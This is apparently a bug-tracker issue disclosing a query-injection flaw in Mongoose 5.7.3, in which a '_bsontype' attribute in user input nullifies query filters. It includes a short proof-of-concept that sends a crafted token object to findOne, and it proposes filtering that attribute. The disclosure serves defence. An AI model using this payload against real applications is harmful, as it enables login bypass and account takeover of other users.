Description
Do you want to request a feature or report a bug?
Vulnerability
What is the current behavior?
With this vulnerability, an attacker might steal sensitive data/bypass authentication in nodejs applications that use mongoose as front end.
When injecting "_bsontype" attribute to a query object (e.g., id in find(id)), Mongoose will directly ignore the query object. This can be abused since most nodejs applications treat user input as an object. For example, an attacker can force the query filter condition to be null by adding another attribute (_bsontype) to the user-input data. By doing this, an attacker can log into other users' accounts or bypass the token verification logics during password reset[1]. Even though Mongoose checks the query object according to the scheme when querying in the form of findOne(id:id_object), the vulnerability can still be exploited if developers do queries like findOne(id).
Similar issues are also found it Mongodb, and we have reported it. However, just to be safe, my suggestion is that mongoose should also filter _bsontype before invoking mongodb since _bsontype is an internal attribute used by mongodb.
If the current behavior is a bug, please provide the steps to reproduce.
Proof of Concept
const mongoose = require('mongoose');
mongoose.connect('mongodb://localhost/bsontype', {useNewUrlParser: true});
const Schema = mongoose.Schema;
const ObjectId = Schema.ObjectId;
const userSchema = new Schema({
author: ObjectId,
username: String,
password: String,
token: String
},);
const users = mongoose.model('users', userSchema);
token = {"t":"wrongToken","_bsontype":"a"};
users.findOne(token, function (err, res) {
console.log(res);
});
What are the versions of Node.js, Mongoose and MongoDB you are using? Note that "latest" is not a version.
Mongoose 5.7.3